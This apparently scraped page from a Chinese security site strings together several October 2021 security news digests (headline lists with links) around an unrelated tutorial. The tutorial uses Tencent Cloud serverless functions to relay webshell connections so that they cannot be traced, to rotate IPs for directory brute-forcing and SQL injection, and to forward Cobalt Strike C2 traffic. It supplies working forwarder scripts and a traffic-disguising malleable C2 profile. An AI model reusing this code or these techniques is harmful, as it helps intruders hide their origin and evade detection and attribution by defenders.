免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、黑客使用 Squirrelwaffle Loader 部署 Qakbot 和 Cobalt Strike https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html 2、恶意 Firefox 附加组件阻止浏览器下载安全更新 https://thehackernews.com/2021/10/malicious-firefox-add-ons-block-browser.html 3、富士电机修补工厂监控软件中的漏洞 https://www.securityweek.com/fuji-electric-patches-vulnerabilities-factory-monitoring-software 4、苹果发布iOS 15.1 补丁修复了 iPhone 的 22 个安全漏洞 https://www.securityweek.com/apple-patches-22-security-flaws-haunting-iphones 5、 Avast 发布了 AtomSilo 和 LockFile 勒索软件解密器 https://securityaffairs.co/wordpress/123854/malware/atomsilo-lockfile-ransomware-decryptor.html 6、Grief 勒索软件攻击了美国全国步枪协会 (NRA) https://securityaffairs.co/wordpress/123849/cyber-crime/grief-ransomware-hit-nra.html 7、TA551 使用 Silver Red-Teaming 工具渗透网络 https://cyware.com/news/ta551-using-silver-red-teaming-tool-to-penetrate-networks-e5c83e78 6、Squid Game壁纸应用程序被用于传播Joker恶意软件 https://www.financialexpress.com/industry/technology/beware-squid-game-app-caught-infecting-android-devices-check-details/2356500/ 7、英国VoIP提供商Voipfone再次遭受DDoS攻击 https://www.ispreview.co.uk/index.php/2021/10/voip-provider-voipfone-uk-knocked-out-by-ddos-attack-again.html 8、多国联合执法逮捕了150名在暗网从事非法商品交易的嫌犯 https://www.securityweek.com/150-people-arrested-us-europe-darknet-drug-probe 9、一项调查显示过去一年，72%的组织受到过DNS攻击 https://www.helpnetsecurity.com/2021/10/26/organizations-dns-attacks/ 10、美国政府要求谷歌跟踪搜索某些关键词的人 https://www.dailymail.co.uk/news/article-10063665/Government-orders-Google-track-searching-certain-names-addresses-phone-numbers.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Adobe 修补了 14 种软件产品中存在的安全漏洞 https://www.securityweek.com/adobe-patches-gaping-security-flaws-14-software-products 2、ZDI 宣布 Pwn2Own Miami 竞赛的目标和奖品 https://www.securityweek.com/targets-and-prizes-announced-2022-ics-themed-pwn2own 3、FBI发布警报称Ranzy Locker 勒索软件已攻击了数十家美国公司 https://securityaffairs.co/wordpress/123801/cyber-crime/ranzy-locker-ransomware.html 4、UltimaSMS 订阅欺诈活动针对数百万 Android 用户 https://securityaffairs.co/wordpress/123795/malware/ultimasms-massive-fraud-campaign.html 5、研究人员发现APT 组织Lazarus 转向 IT 供应链攻击 https://threatpost.com/lazarus-apt-it-supply-chain/175772/ 6、伊朗各地加油站遭受网络攻击 https://therecord.media/suspected-cyberattack-temporarily-disrupts-gas-stations-across-iran 7、 EntroLink VPN 设备中的零日漏洞被勒索软件利用 https://therecord.media/ransomware-gangs-are-abusing-a-zero-day-in-entrolink-vpn-appliances 8、英国超市特易购的网站和应用程序遭受网络攻击 https://www.bbc.com/news/business-59027423 9、Gummy Browsers攻击可收集用户的浏览器指纹信息 https://cyware.com/news/gummy-browsers-attack-lets-hackers-spoof-your-digital-identity-eaf11598 10、Magnitude EK 利用基于 Chromium 的浏览器漏洞 https://cyware.com/news/magnitude-ek-exploiting-chromium-based-browser-flaws-93e9aec3

前言 之前学到一些云函数的利用，感觉很有趣，于是借此篇来总结一下三种对云函数的简单利用方式。 云函数 云函数（Serverless Cloud Function，SCF）是腾讯云为企业和开发者们提供的无服务器执行环境，帮助您在无需购买和管理服务器的情况下运行代码。您只需使用平台支持的语言编写核心代码并设置代码运行的条件，即可在腾讯云基础设施上弹性、安全地运行代码。SCF 是实时文件处理和数据处理等场景下理想的计算平台。总结云函数的几个特性： 多出口 调用时创建执行 无需服务器VPS承载 防溯源连接Webshell 之前最好的是某安全攻防实验室公众号发布了一篇<论如何防溯源连接Webshell>，利用云函数多出口的特性来规避溯源，可惜的是不久后就该文章就被删除了。以下介绍实际的利用方式 云函数创建 选择自定义创建 函数代码中脚本如下，主要是通过将Webshell地址作为参数传入云函数API中，在云函数服务端脚本中重组Webshell地址以及POST命令内容，将重组后的请求内容转发给Webshel #!/usr/bin/env # -*- coding:utf-8 -*- import requests import json from urllib.parse import urlsplit def geturl(urlstr):        jurlstr = json.dumps(urlstr)        dict_url = json.loads(jurlstr)        return dict_url['u'] def main_handler(event, context):        url = geturl(event['queryString'])        host = urlsplit(url).netloc        postdata = event['body']        headers=event['headers']        headers["HOST"] = host        resp=requests.post(url,data=postdata,headers=headers,verify=False)        response={        "isBase64Encoded": False,        "statusCode": 200,        "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},        "body": resp.text   }        return response 在触发器配置中选择API网关触发，然后点击创建，过一会会提示创建成功。 利用 我们可以通过蚁剑直接连接Webshell，URL请求地址填为api地址+webshell地址 https://service-dafetmeh-xxxx/release/Webshell_Bypass?u=http://xxxx/webshell.php  然后vps端通过监控日志查看访问webshell的ip地址 通过access.log可以发现每次请求都是不同的ip地址并且都是来自上海地区的腾讯云(根据自己选择地区而改变)  通过云函数的方法我们便可以隐藏连接Webshell的本机IP地址，从而防止溯源，如果使用可以蚁剑，为了达到更隐秘的目的，可以自行对Webshell流量进行加解密的操作来逃逸流量检测，流量检测+白名单IOC的方式可以完美的逃避检测。 注入/目录爆破爆破防Ban 云函数其实也可以作为一种变相的代理池供我们所用，利用云函数的多出口性来防止爆破或者SQL注入的时候被Ban 云函数创建 这里可以哈希安全团队公开的SCF-Proxy来实现，第一次看到Scf-Proxy的概念的应该是学蚁致用的作者，通过客户端监听获取请求并且组装API请求，服务端云函数解析且重组API请求，通过SCF-Proxy不光可以实现代理http请求，也可以代理https请求(类似Burp中间人监听的方式) 项目地址：https://github.com/hashsecteam/scf-proxy  下载下来然后利用Golang编译客户端和服务端，这里我把客户端编译成Win版本使用 还是选择自定义创建，但是这里要选择Go，而不是默认的python，并，执行方法改为server，且选择本地上传zip，将server.zip上传上去 触发管理中依然选择API网关管理，创建完成后来到触发管理获取API地址 利用 首先客户端开启监听 ./client.exe -port 10086 云函数api地址 此时再通过dirsearch设置http代理的方式爆破VPS的目录  查看access_log可以看到爆破的ip地址分布 由于此次选择的是广州地区，于是访问的ip基本都是来自广州  也可以代理访问https网站 由此可以实现爆破目录以及Sqlmap的爆破不被Ban C2隐藏 通过云函数的特性，我们依然可以做到CS上线的隐藏，由于Cs支持HTTP/HTTPS类型的Beacon，因此我们也可以通过云函数来转发HTTP/HTTPS请求，该方法学习自狼组北美第一突破手师傅 云函数创建 与第一种别无二样，依然选择API网关触发的方式，就是云函数服务端脚本修改为如下 # -*- coding: utf8 -*- import json,requests,base64 def main_handler(event, context):    C2='http://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标~    path=event['path']    headers=event['headers']    print(event)    if event['httpMethod'] == 'GET' :        resp=requests.get(C2+path,headers=headers,verify=False)    else:        resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)        print(resp.headers)        print(resp.content)    response={        "isBase64Encoded": True,        "statusCode": resp.status_code,        "headers": dict(resp.headers),        "body": str(base64.b64encode(resp.content))[2:-1]   }    return response Cs可以定制Profile来更加隐匿流量这里使用如下的Profile set sample_name "kris_abao"; set sleeptime "3000"; set jitter   "0"; set maxdns   "255"; set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"; http-get {   set uri "/api/getit";   client {       header "Accept" "*/*";       metadata {           base64;           prepend "SESSIONID=";           header "Cookie";       }   }   server {       header "Content-Type" "application/ocsp-response";       header "content-transfer-encoding" "binary";       header "Server" "Nodejs";       output {           base64;           print;       }   } } http-stager {     set uri_x86 "/vue.min.js";   set uri_x64 "/bootstrap-2.min.js"; } http-post {   set uri "/api/postit";   client {       header "Accept" "*/*";       id {           base64;           prepend "JSESSION=";           header "Cookie";       }       output {           base64;           print;       }   }   server {       header "Content-Type" "application/ocsp-response";       header "content-transfer-encoding" "binary";       header "Connection" "keep-alive";       output {           base64;           print;       }   } } 创建完后放到将api.profile放到服务端Cs上可以通过c2lint检查一下profile，可以看到正常的定义http类型Beacon的get和post请求时的样子 监听设置 生成木马，点击后上线 公网地址会不断的跳，因为这里呈现的是请求源的IP，也就是我们的云函数IP地址，基本都是腾讯的IDC机房中的IP 在该过程中遇到了一些问题，比如说Stager较大，导致请求超时，这时候可以修改代码加点演示设置即可。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员发现Polygon 中的严重漏洞获得 200 万美元奖励 https://www.securityweek.com/researcher-earns-2-million-critical-vulnerability-polygon 2、微软警告称与俄有关的APT组织持续进行IT供应链攻击 https://securityaffairs.co/wordpress/123754/apt/nobelium-apt-it-supply-chain.html 3、一个未知勒索团伙利用 BillQuick 中的SQL注入进行攻击 https://securityaffairs.co/wordpress/123783/cyber-crime/ransomware-gang-billquick-web-suite-bug.html 4、Discourse 存在严重远程代码执行漏洞 https://securityaffairs.co/wordpress/123775/hacking/discourse-rce.html 5、研究人员发现爱立信 OSS-RC 组件中两个严重漏洞 https://securityaffairs.co/wordpress/123764/security/ericsson-oss-rc-flaws.html 6、Emsisoft 发布了BlackMatter 勒索软件解密器 https://securityaffairs.co/wordpress/123736/security/blackmatter-decryptor-pat-victims.html 7、韩国电信公司KT遭受DDoS攻击导致网络瘫痪 https://www.zdnet.com/article/large-ddos-attack-shuts-down-south-korean-telcos-nationwide-network/ 8、Groove勒索软件呼吁同行联合打击美国政府 https://securityaffairs.co/wordpress/123684/malware/groove-ransomware-gang-call-to-action.html 9、报告称东京奥运会期间遭4.5 亿次网络攻击 https://www.zdnet.com/article/nearly-450-million-cyberattacks-attempted-on-japan-olympics-infrastructure-ntt 10、 微软发现钓鱼工具TodayZoo 被广泛用于证书窃取攻击 https://securityaffairs.co/wordpress/123729/cyber-crime/todayzoo-phishing-kit.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、npm包UAParser.js遭供应链攻击被植入恶意挖矿软件 https://www.securityweek.com/critical-severity-warning-malware-embedded-popular-javascript-library 2、Facebook 推出用于查找 SSRF 漏洞的新工具 https://www.securityweek.com/facebook-introduces-new-tool-finding-ssrf-vulnerabilities 3、北约发布首个人工智能战略 https://securityaffairs.co/wordpress/123715/security/nato-strategy-artificial-intelligence.html 4、有人在黑客论坛出售 5000 万莫斯科司机的数据 https://securityaffairs.co/wordpress/123711/data-breach/moscow-drivers-data-leak.html 5、思科修复了 SD-WAN 中的操作系统命令注入漏洞 https://securityaffairs.co/wordpress/123704/security/cisco-sd-wan-flaw.html 6、FIN7 黑客组织创建虚假的网络安全公司招人进行勒索攻击 https://securityaffairs.co/wordpress/123673/cyber-crime/fin7-fake-cybersecurity-firm.html 7、美国执法部门入侵并破坏了 REvil 勒索团伙的服务器 https://www.securityweek.com/revil-ransomware-gang-hit-law-enforcement-hack-back-operation 8、谷歌推出 Android Enterprise 漏洞赏金计划 https://www.bleepingcomputer.com/news/security/google-launches-android-enterprise-bug-bounty-program/ 9、工业公司AUVESY的Versiondog数据管理产品存在多个严重漏洞 https://www.securityweek.com/critical-vulnerabilities-found-auvesy-product-used-major-industrial-firms 10、TodayZoo网络钓鱼活动仿冒Microsoft 365登录页面 https://www.zdnet.com/article/this-frankensteins-monster-of-a-phishing-campaign-is-after-your-passwords/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、FiveSys Rootkit 滥用微软发布的数字签名 https://www.securityweek.com/fivesys-rootkit-abuses-microsoft-issued-digital-signature 2、研究人员发现WinRAR 中的远程代码执行漏洞 https://securityaffairs.co/wordpress/123652/hacking/winrar-trial-flaw.html 3、美国将限制网安产品出口到俄罗斯和中国 https://www.securityweek.com/us-curb-hacking-tool-exports-russia-china 4、技嘉被 AvosLocker 勒索软件攻击 https://threatpost.com/gigabyte-avoslocker-ransomware-gang/175642/ 5、黑客窃取浏览器Cookie以劫持知名YouTube创作者帐户 https://thehackernews.com/2021/10/hackers-stealing-browser-cookies-to.html 6、新的 Gummy 攻击可以捕获数字指纹并发起浏览器欺骗攻击 https://www.bleepingcomputer.com/news/security/new-gummy-browsers-attack-lets-hackers-spoof-tracking-profiles/ 7、Evil Corp 推出名为 Macaw Locker 的新型勒索软件 https://securityaffairs.co/wordpress/123661/cyber-crime/evil-corp-macaw-locker.html 8、Chrome 95 将FTP代码从代码库中删除 https://www.theregister.com/2021/10/20/ftp_chrome_95/ 9、Slack存在XSLeak漏洞可以对用户进行去匿名化 https://portswigger.net/daily-swig/slack-contains-an-xsleak-vulnerability-that-de-anonymizes-users 10、APT组织lone wolf正在积极利用一个古老的微软Office漏洞 https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员使用新的“SmashEx”CPU 攻击技术破解 Intel SGX https://thehackernews.com/2021/10/researchers-break-intel-sgx-with-new.html 2、微软警告影响 Surface Pro 3 设备的新安全漏洞 https://thehackernews.com/2021/10/microsoft-warns-of-new-security-flaw.html 3、宏碁已确认除印度服务器外黑客还入侵了台湾部分服务器 https://www.securityweek.com/acer-confirms-breach-servers-taiwan 4、谷歌发布Chrome 95 ，修复了 19 个漏洞 https://www.securityweek.com/google-patches-19-vulnerabilities-chrome-95-browser-refresh 5、PurpleFox 僵尸网络利用WebSockets进行C2通信 https://securityaffairs.co/wordpress/123623/malware/purplefox-botnet-websockets.html 6、"网络军火商" Zerodium 正在寻找NordVPN等客户端零日漏洞 https://securityaffairs.co/wordpress/123581/hacking/zerodium-expressvpn-nordvpn-surfshark.html 7、Oracle 10 月重要补丁更新包含 419 个安全补丁 https://www.securityweek.com/oracles-october-2021-cpu-includes-419-security-patches 8、macOS Gatekeeper 绕过漏洞正在被广泛利用 https://cyware.com/news/poc-exploit-that-bypass-macos-security-is-out-and-being-exploited-1379c82f 9、TA505团伙通过电子邮件传播FlawedGrace新变种 https://threatpost.com/ta505-retooled-flawedgrace-rat/175559/ 10、FBI警告用于窃取财务和个人数据的虚假政府网站 https://www.bleepingcomputer.com/news/security/fbi-warns-of-fake-govt-sites-used-to-steal-financial-personal-data/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员披露了Squirrel Engine中的严重漏洞 https://thehackernews.com/2021/10/squirrel-engine-bug-could-let-attackers.html 2、FBI、CISA和NSA联合发布 BlackMatter 勒索软件紧急警告 https://securityaffairs.co/wordpress/123549/cyber-crime/blackmatter-ransomware-joint-advisory.html 3、赛门铁克发现新的APT组织Harvester针对南亚电信提供商和IT公司 https://securityaffairs.co/wordpress/123559/apt/harvester-targets-telcos.html 4、研究人员发现新的 Karma 勒索软件可能是Nemty的变体 https://securityaffairs.co/wordpress/123568/malware/karma-ransomware-nemty-similarities.html 5、Node.js修复了两个HTTP请求走私漏洞 https://portswigger.net/daily-swig/node-js-was-vulnerable-to-a-novel-http-request-smuggling-technique 6、反电信网络诈骗法（草案）首次提请审议 https://www.cnbeta.com/articles/tech/1192495.htm 7、美国将价值52亿美元的比特币交易与勒索软件挂钩 https://www.bleepingcomputer.com/news/security/us-links-52-billion-worth-of-bitcoin-transactions-to-ransomware/ 8、Thingiverse数据泄漏影响228000个订户 https://www.databreachtoday.com/thingiverse-data-leak-affects-228000-subscribers-a-17729 9、中兴通讯LTE路由器中发现多个漏洞 https://blog.talosintelligence.com/2021/10/vuln-spotlight-.html 10、黑客入侵了阿根廷政府的 IT 网络并窃取了该国所有ID数据库 https://therecord.media/hacker-steals-government-id-database-for-argentinas-entire-population

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、安全研究人员发布BlackByte勒索软件解密器 https://www.securityweek.com/free-decryptor-released-blackbyte-ransomware 2、密码审计和恢复工具 L0phtCrack 已开源发布 https://www.securityweek.com/password-auditing-tool-l0phtcrack-released-open-source 3、Sinclair 广播集团遭勒索攻击，旗下电视台停播 https://www.securityweek.com/sinclair-hit-ransomware-attack-tv-stations-disrupted 4、TeamTNT 在 Docker Hub 上部署恶意 Docker 镜像 https://securityaffairs.co/wordpress/123535/cyber-crime/teamtnt-docker-attack.html 5、微软敦促系统管理员修补 PowerShell 漏洞以修复 WDAC 绕过 https://www.bleepingcomputer.com/news/microsoft/microsoft-asks-admins-to-patch-powershell-to-fix-wdac-bypass 6、在 Tor 站点遭到入侵后，REvil 勒索软件团伙再次停止运营 https://thehackernews.com/2021/10/revil-ransomware-gang-goes-underground.html 7、Windows、iOS、Chrome等多种系统和应用在天府杯上被攻破 https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html 8、Lyceum组织使用C++编写的新恶意软件发起攻击 https://securelist.com/lyceum-group-reborn/104586/ 9、Minecraft成为受恶意软件感染最多的游戏 https://www.hackread.com/minecraft-most-malware-infected-game/ 10、事件监控解决方案Prometheus容易暴露敏感数据 https://www.securityweek.com/many-prometheus-endpoints-expose-sensitive-data

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Trickbot攻击者扩大恶意软件分发渠道 https://thehackernews.com/2021/10/attackers-behind-trickbot-expanding.html 2、勒索软件攻击了美国 3 个供水设施的 SCADA 系统 https://www.securityweek.com/ransomware-hit-scada-systems-3-water-facilities-us 3、研究人员披露了影响所有 AMD CPU 的新侧信道攻击 https://www.securityweek.com/researchers-disclose-new-side-channel-attacks-affecting-all-amd-cpus 4、iPhone 13 iOS 15 在天府杯中被破解 https://securityaffairs.co/wordpress/123476/hacking/tianfu-cup-2021-hacking-contest.html 5、厄瓜多尔最大银行 Banco Pichincha遭黑客攻击后服务中断 https://securityaffairs.co/wordpress/123465/cyber-crime/ecuadors-banco-pichincha-cyberattack.html 6、埃森哲披露 LockBit 勒索软件攻击后的数据泄露 https://securityaffairs.co/wordpress/123422/data-breach/accenture-data-breach-lockbit-ransomware.html 7、Juniper 发布补丁修补70多个漏洞 https://www.securityweek.com/juniper-networks-patches-over-70-vulnerabilities 8、与俄罗斯有关的 TA505 组织新的邮件钓鱼活动针对金融机构 https://securityaffairs.co/wordpress/123441/breaking-news/ta505-mirrorblast-malspam-campaign.html 9、MyKings僵尸网络利用受感染的计算机网络挖矿 https://www.zdnet.com/article/this-relentless-malware-botnet-has-made-millions-with-a-surprisingly-simple-trick/ 10、Twitch表示数据泄露事件只影响了一小部分用户 https://www.securityweek.com/twitch-says-hack-impacted-small-fraction-users